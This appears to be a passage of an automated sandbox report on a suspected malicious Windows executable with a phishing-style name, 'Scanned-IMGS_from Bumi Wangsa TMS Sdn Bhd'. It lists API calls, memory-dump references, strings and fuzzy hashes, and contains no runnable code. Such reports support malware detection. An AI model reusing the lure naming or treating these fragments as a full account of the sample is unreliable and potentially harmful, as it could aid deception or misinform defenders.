                                                        • API String ID: 3225163088-0
                                                        • Opcode ID: 8f1ef9744c15f1f3996c60b82e34e402b2b5e5a0964dc661e3f02f0c52b13cd3
                                                        • Instruction ID: 12e2358f9e85ce103b8db4f8b7c86f7cf7798a6206fd03462956882915bdf820
                                                        • Opcode Fuzzy Hash: 8f1ef9744c15f1f3996c60b82e34e402b2b5e5a0964dc661e3f02f0c52b13cd3
                                                        • Instruction Fuzzy Hash: 75216D70800259EFDB11CFA9EC447AD7BB9FB203A2F148636F8109A1A0D3719896DB90
                                                        APIs
                                                        Similarity
                                                        • API ID: _memcmp
                                                        • String ID:
                                                        • API String ID: 2931989736-0
                                                        • Opcode ID: 3a341a5c95b39114a5b9c41ae7b9e9ecd1ed0e159c4469e2366746a59f3d9692
                                                        • Instruction ID: 51d83d9aeb4f98f898ae73b1870df140497b73ca7e059a859135c751270a8590
                                                        • Opcode Fuzzy Hash: 3a341a5c95b39114a5b9c41ae7b9e9ecd1ed0e159c4469e2366746a59f3d9692
                                                        • Instruction Fuzzy Hash: 5B0175B17041057BE204A6259D42FEBB79CAB613B4F84C63AFD0896287FA51DF5283E1
                                                        APIs
                                                        • GetCurrentThreadId.KERNEL32 ref: 00A84D5C
                                                        • __beginthreadex.LIBCMT ref: 00A84D7A
                                                        • MessageBoxW.USER32(?,?,?,?), ref: 00A84D8F
                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00A84DA5
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00A84DAC
                                                        Similarity
                                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                        • String ID:
                                                        • API String ID: 3824534824-0
                                                        • Opcode ID: 0d1963da17d5c71f9309192a7a7723c0b66db296d1ad8008fea239451fb20db1
                                                        • Instruction ID: 7f37e6391e5e22e59426ceca748d5b78a02737e7830775a786bf3ee5d3d0c190
                                                        • Opcode Fuzzy Hash: 0d1963da17d5c71f9309192a7a7723c0b66db296d1ad8008fea239451fb20db1
                                                        • Instruction Fuzzy Hash: C0110876D04245BFCB05DBE89C48ADA7FACEB49320F144765FA14D7390D7758D0587A0
                                                        APIs
                                                        • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00A78766
                                                        • GetLastError.KERNEL32(?,00A7822A,?,?,?), ref: 00A78770
                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00A7822A,?,?,?), ref: 00A7877F
                                                        • HeapAlloc.KERNEL32(00000000,?,00A7822A,?,?,?), ref: 00A78786
                                                        • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00A7879D
                                                        Similarity
                                                        • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                        • String ID:
                                                        • API String ID: 842720411-0
                                                        • Opcode ID: e4fd48d5031406ce734e3f94e4023dfd3e310a4b9ff54e33362a5a18b2240969
                                                        • Instruction ID: 6aa11b7f053c5f9fc8cb81e04e82ce7274ea106100349a4b57eb8d2b8e70209e
                                                        • Opcode Fuzzy Hash: e4fd48d5031406ce734e3f94e4023dfd3e310a4b9ff54e33362a5a18b2240969
                                                        • Instruction Fuzzy Hash: 9F014F71240205EFDB288FEADC4CD677B6CEF863557204529F94AC2160DB318C01CA60
                                                        APIs
                                                        • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00A85502
                                                        • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00A85510
                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00A85518
                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00A85522
                                                        • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00A8555E
                                                        Similarity
                                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                                        • String ID:
                                                        • API String ID: 2833360925-0
                                                        • Opcode ID: 687bc2ccde5229cf603b6dd7c6327d35c2a0266914bb3f2411c5745a5575c0d3
                                                        • Instruction ID: 3c0282e1b3ff691937465d2cb2d3a885f28d9ce42254bfcb801b0ebbc542b58f
                                                        • Opcode Fuzzy Hash: 687bc2ccde5229cf603b6dd7c6327d35c2a0266914bb3f2411c5745a5575c0d3
                                                        • Instruction Fuzzy Hash: 8F015B35C00A1ADBCF08EFF9E848AEDBB79BB09701F000156E941B2140DB315655CBA1
                                                        APIs
                                                        • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00A7758C,80070057,?,?,?,00A7799D), ref: 00A7766F
                                                        • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00A7758C,80070057,?,?), ref: 00A7768A
                                                        • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00A7758C,80070057,?,?), ref: 00A77698
                                                        • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00A7758C,80070057,?), ref: 00A776A8
                                                        • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00A7758C,80070057,?,?), ref: 00A776B4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: From$Prog$FreeStringTasklstrcmpi
                                                        • String ID:
                                                        • API String ID: 3897988419-0
                                                        • Opcode ID: 84e1180e73686edac0868357a6e76e0500b4302d5b6ace4862a44361f5ba9dcb
                                                        • Instruction ID: 94861a78da095d8fd991d2b1070b34e1f9a736521be4ec7130b18c537521111f
                                                        • Opcode Fuzzy Hash: 84e1180e73686edac0868357a6e76e0500b4302d5b6ace4862a44361f5ba9dcb
                                                        • Instruction Fuzzy Hash: DF01D476600605BFDB119F98DC04BAE7BACEB49751F208128FD08D2225E735DD0197A0
                                                        APIs
                                                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00A78608
                                                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00A78612
                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00A78621
                                                        • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00A78628
                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00A7863E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                        • String ID:
                                                        • API String ID: 44706859-0
                                                        • Opcode ID: 0f70531a1d89a6b87e712f9eb3ba5c1146bdbfb446db0b24565de8751296165d
                                                        • Instruction ID: 40a64ec088ed5d71db9850d64380216323e166f798b16869785d4c22378cec80
                                                        • Opcode Fuzzy Hash: 0f70531a1d89a6b87e712f9eb3ba5c1146bdbfb446db0b24565de8751296165d
                                                        • Instruction Fuzzy Hash: 43F0C230240205BFEB104FE4DC8DE6B3BACEF8AB55B008135F90DC6190EBB09C42DA60
                                                        APIs
                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00A78669
                                                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00A78673
                                                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00A78682
                                                        • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00A78689
                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00A7869F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                        • String ID:
                                                        • API String ID: 44706859-0
                                                        • Opcode ID: 7da359649348e90c7bafb3dc886bc6a12998b3b8eb7cd6cf4f9a02222368b216
                                                        • Instruction ID: 0932e4292770afd99c5865ba7ae3ecdddb2c5e843c6f2f83a6efac79fb12701b
                                                        • Opcode Fuzzy Hash: 7da359649348e90c7bafb3dc886bc6a12998b3b8eb7cd6cf4f9a02222368b216
                                                        • Instruction Fuzzy Hash: ADF0AF70240205BFEB215FE4EC8CE673BACEF8A765B104025F909C6290DBA09802EA61
                                                        APIs
                                                        • GetDlgItem.USER32(?,000003E9), ref: 00A7C6BA
                                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 00A7C6D1
                                                        • MessageBeep.USER32(00000000), ref: 00A7C6E9
                                                        • KillTimer.USER32(?,0000040A), ref: 00A7C705
                                                        • EndDialog.USER32(?,00000001), ref: 00A7C71F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                        • String ID:
                                                        • API String ID: 3741023627-0
                                                        • Opcode ID: 4d26472f9cdecae2bfe92da3cb91c016b26a5ecc47013f338724a0ae9fa466bd
                                                        • Instruction ID: 95fd45fcfb306cd2324c29fd5408d8995690283b92380ccc2e890d90092b9a8c
                                                        • Opcode Fuzzy Hash: 4d26472f9cdecae2bfe92da3cb91c016b26a5ecc47013f338724a0ae9fa466bd
                                                        • Instruction Fuzzy Hash: DB01D630400705ABEB289FA0DD8EF9677B8FF01701F00866DF586A14E1EBF0A9558F84
                                                        APIs
                                                        • EndPath.GDI32(?), ref: 00A213BF
                                                        • StrokeAndFillPath.GDI32(?,?,00A5BAD8,00000000,?), ref: 00A213DB
                                                        • SelectObject.GDI32(?,00000000), ref: 00A213EE
                                                        • DeleteObject.GDI32 ref: 00A21401
                                                        • StrokePath.GDI32(?), ref: 00A2141C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Path$ObjectStroke$DeleteFillSelect
                                                        • String ID:
                                                        • API String ID: 2625713937-0
                                                        • Opcode ID: f8e819da063c73a2ef949ee870d428a6195c6175bc321854c26574b527433726
                                                        • Instruction ID: 203c979e47c6b9f3dde11c4ab45f549d499cef4b83c464200865279ee23cef55
                                                        • Opcode Fuzzy Hash: f8e819da063c73a2ef949ee870d428a6195c6175bc321854c26574b527433726
                                                        • Instruction Fuzzy Hash: C1F0C970004249EFDB1ADFEAEC8C7583BA5AB21366F048625E469890F1D7314997DF50
                                                        APIs
                                                        • CoInitialize.OLE32(00000000), ref: 00A8C69D
                                                        • CoCreateInstance.OLE32(00AB2D6C,00000000,00000001,00AB2BDC,?), ref: 00A8C6B5
                                                          • Part of subcall function 00A27F41: _memmove.LIBCMT ref: 00A27F82
                                                        • CoUninitialize.OLE32 ref: 00A8C922
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: CreateInitializeInstanceUninitialize_memmove
                                                        • String ID: .lnk
                                                        • API String ID: 2683427295-24824748
                                                        • Opcode ID: f36a344bd6b4a7d902c83bfa6db7d8c9a2765d6bd6d98d8b38b9c340a59f3262
                                                        • Instruction ID: d6b52c7b46e74634be1a436c68c7cd2fdd757bf4f03d3e2a1d2b4fb966a8cb48
                                                        • Opcode Fuzzy Hash: f36a344bd6b4a7d902c83bfa6db7d8c9a2765d6bd6d98d8b38b9c340a59f3262
                                                        • Instruction Fuzzy Hash: FBA14C71108315AFD700EF68D991EABB7E8FF84744F00492CF5969B192EB70EA09CB52
                                                        APIs
                                                          • Part of subcall function 00A40FF6: std::exception::exception.LIBCMT ref: 00A4102C
                                                          • Part of subcall function 00A40FF6: __CxxThrowException@8.LIBCMT ref: 00A41041
                                                          • Part of subcall function 00A27F41: _memmove.LIBCMT ref: 00A27F82
                                                          • Part of subcall function 00A27BB1: _memmove.LIBCMT ref: 00A27C0B
                                                        • __swprintf.LIBCMT ref: 00A3302D
                                                        Strings
                                                        • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00A32EC6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                        • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                        • API String ID: 1943609520-557222456
                                                        • Opcode ID: 3d527612e4ba65731a6d09a5f8232b7369c8d5be6f41db2fd4a8e0ec70ac0a6d
                                                        • Instruction ID: 1ea54409e8d94a19b46cfaddeac1c7b9225eb1cb26e23884e3527f44973f4c50
                                                        • Opcode Fuzzy Hash: 3d527612e4ba65731a6d09a5f8232b7369c8d5be6f41db2fd4a8e0ec70ac0a6d
                                                        • Instruction Fuzzy Hash: 47916D765083119FCB18EF28EA85C6FB7B4EF85750F04492DF4869B2A1DA70EE44CB52
                                                        APIs
                                                          • Part of subcall function 00A248AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A248A1,?,?,00A237C0,?), ref: 00A248CE
                                                        • CoInitialize.OLE32(00000000), ref: 00A8BC26
                                                        • CoCreateInstance.OLE32(00AB2D6C,00000000,00000001,00AB2BDC,?), ref: 00A8BC3F
                                                        • CoUninitialize.OLE32 ref: 00A8BC5C
                                                          • Part of subcall function 00A29997: __itow.LIBCMT ref: 00A299C2
                                                          • Part of subcall function 00A29997: __swprintf.LIBCMT ref: 00A29A0C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                        • String ID: .lnk
                                                        • API String ID: 2126378814-24824748
                                                        • Opcode ID: a3ff588b03fb8b954a6a33c9d68f7e5eeae73e3873a59f9c24a53246d00ac05a
                                                        • Instruction ID: f0108c3ee12cf2cf5677fdceb11393a8c1e0fb452625b97f4e6d0a9780dfebbb
                                                        • Opcode Fuzzy Hash: a3ff588b03fb8b954a6a33c9d68f7e5eeae73e3873a59f9c24a53246d00ac05a
                                                        • Instruction Fuzzy Hash: 57A17875604311AFCB10EF18C584D6ABBE5FF89714F048998F8999B3A2CB31ED45CB91
                                                        APIs
                                                        • __startOneArgErrorHandling.LIBCMT ref: 00A452DD
                                                          • Part of subcall function 00A50340: __87except.LIBCMT ref: 00A5037B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: ErrorHandling__87except__start
                                                        • String ID: pow
                                                        • API String ID: 2905807303-2276729525
                                                        • Opcode ID: 10a212efb9ae6c8ad5549458dbe865c491c06c3983db14398a21c0fb661cb80b
                                                        • Instruction ID: a5bf6454026f3d96bbe87cf98fe63fa8540f001f0bdfead012033509365e040c
                                                        • Opcode Fuzzy Hash: 10a212efb9ae6c8ad5549458dbe865c491c06c3983db14398a21c0fb661cb80b
                                                        • Instruction Fuzzy Hash: 20519E35E0D60187CB11BB34CA517BE2BB4BB80751F208D59E8D58A1E7EFB48CC89A41
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: #$+
                                                        • API String ID: 0-2552117581
                                                        • Opcode ID: e77e427241a3a8ac14009d0d7038c1a66d006d38f6971901c4e9b0a8eb47401a
                                                        • Instruction ID: 913a0aace53fdf59619b779083e0dc2ee94c642c366a9acbe91e5d60cfd6d1b7
                                                        • Opcode Fuzzy Hash: e77e427241a3a8ac14009d0d7038c1a66d006d38f6971901c4e9b0a8eb47401a
                                                        • Instruction Fuzzy Hash: D65131399042468FDF25DF78C888AFA7BB4EF5A310F14C065EC959B2A1C774AD42C720
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: _memset$_memmove
                                                        • String ID: ERCP
                                                        • API String ID: 2532777613-1384759551
                                                        APIs
                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00AAF910,00000000,?,?,?,?), ref: 00AA7C4E
                                                        • GetWindowLongW.USER32 ref: 00AA7C6B
                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00AA7C7B
                                                        Strings
                                                        Similarity
                                                        • API ID: Window$Long
                                                        • String ID: SysTreeView32
                                                        • API String ID: 847901565-1698111956
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00AA76D0
                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00AA76E4
                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00AA7708
                                                        Strings
                                                        Similarity
                                                        • API ID: MessageSend$Window
                                                        • String ID: SysMonthCal32
                                                        • API String ID: 2326795674-1439706946
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00AA6FAA
                                                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00AA6FBA
                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00AA6FDF
                                                        Strings
                                                        Similarity
                                                        • API ID: MessageSend$MoveWindow
                                                        • String ID: Listbox
                                                        • API String ID: 3315199576-2633736733
                                                        APIs
                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00A7914F
                                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00A79166
                                                        • SendMessageW.USER32(?,0000000D,?,00000000), ref: 00A7919E
                                                        Strings
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: @U=u
                                                        • API String ID: 3850602802-2594219639
                                                        APIs
                                                        • SendMessageW.USER32(00000402,00000000,00000000), ref: 00A9613B
                                                        • SendMessageW.USER32(0000000C,00000000,?), ref: 00A9617C
                                                        • SendMessageW.USER32(0000000C,00000000,?), ref: 00A961A4
                                                        Strings
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: @U=u
                                                        • API String ID: 3850602802-2594219639
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00AA79E1
                                                        • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00AA79F6
                                                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00AA7A03
                                                        Strings
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: msctls_trackbar32
                                                        • API String ID: 3850602802-1010561917
                                                        APIs
                                                        • GetWindowTextLengthW.USER32(00000000), ref: 00AA6C11
                                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00AA6C20
                                                        Strings
                                                        Similarity
                                                        • API ID: LengthMessageSendTextWindow
                                                        • String ID: @U=u$edit
                                                        • API String ID: 2978978980-590756393
                                                        APIs
                                                          • Part of subcall function 00A27F41: _memmove.LIBCMT ref: 00A27F82
                                                          • Part of subcall function 00A7B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00A7B0E7
                                                        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00A79355
                                                        Strings
                                                        Similarity
                                                        • API ID: ClassMessageNameSend_memmove
                                                        • String ID: @U=u$ComboBox$ListBox
                                                        • API String ID: 372448540-2258501812
                                                        APIs
                                                          • Part of subcall function 00A27F41: _memmove.LIBCMT ref: 00A27F82
                                                          • Part of subcall function 00A7B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00A7B0E7
                                                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 00A7924D
                                                        Strings
                                                        Similarity
                                                        • API ID: ClassMessageNameSend_memmove
                                                        • String ID: @U=u$ComboBox$ListBox
                                                        • API String ID: 372448540-2258501812
                                                        APIs
                                                          • Part of subcall function 00A27F41: _memmove.LIBCMT ref: 00A27F82
                                                          • Part of subcall function 00A7B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00A7B0E7
                                                        • SendMessageW.USER32(?,00000182,?,00000000), ref: 00A792D0
                                                        Strings
                                                        Similarity
                                                        • API ID: ClassMessageNameSend_memmove
                                                        • String ID: @U=u$ComboBox$ListBox
                                                        • API String ID: 372448540-2258501812
                                                        APIs
                                                        • GetForegroundWindow.USER32(?,00AE67B0,00AADB17,000000FC,?,00000000,00000000,?,?,?,00A5BBB9,?,?,?,?,?), ref: 00AAAF8B
                                                        • GetFocus.USER32 ref: 00AAAF93
                                                          • Part of subcall function 00A22612: GetWindowLongW.USER32(?,000000EB), ref: 00A22623
                                                          • Part of subcall function 00A225DB: GetWindowLongW.USER32(?,000000EB), ref: 00A225EC
                                                        • SendMessageW.USER32(0177F430,000000B0,000001BC,000001C0), ref: 00AAB005
                                                        Strings
                                                        Similarity
                                                        • API ID: Window$Long$FocusForegroundMessageSend
                                                        • String ID: @U=u
                                                        • API String ID: 3601265619-2594219639
                                                        APIs
                                                          • Part of subcall function 00A3619A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00A361B1
                                                        • SendMessageW.USER32(?,0000000C,00000000,?), ref: 00A361DF
                                                        • GetParent.USER32(?), ref: 00A7111F
                                                        • InvalidateRect.USER32(00000000,?,00A33BAF,?,00000000,00000001), ref: 00A71126
                                                        Strings
                                                        Similarity
